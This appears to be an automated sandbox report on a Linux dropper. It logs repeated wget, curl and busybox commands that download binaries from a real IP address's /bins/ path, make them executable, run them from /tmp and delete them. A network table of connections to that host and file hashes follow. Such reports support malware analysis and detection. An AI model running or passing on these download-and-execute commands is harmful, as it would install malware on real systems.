[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/864-1-0xb66e8000-0xb66f9044-memory.dmp

memory/864-2-0xb66ca000-0xb66db044-memory.dmp

memory/882-3-0xb6701000-0xb6712044-memory.dmp

memory/882-4-0xb66cb000-0xb66dc044-memory.dmp

memory/902-5-0xb673d000-0xb674e044-memory.dmp

memory/908-6-0xb676f000-0xb6780044-memory.dmp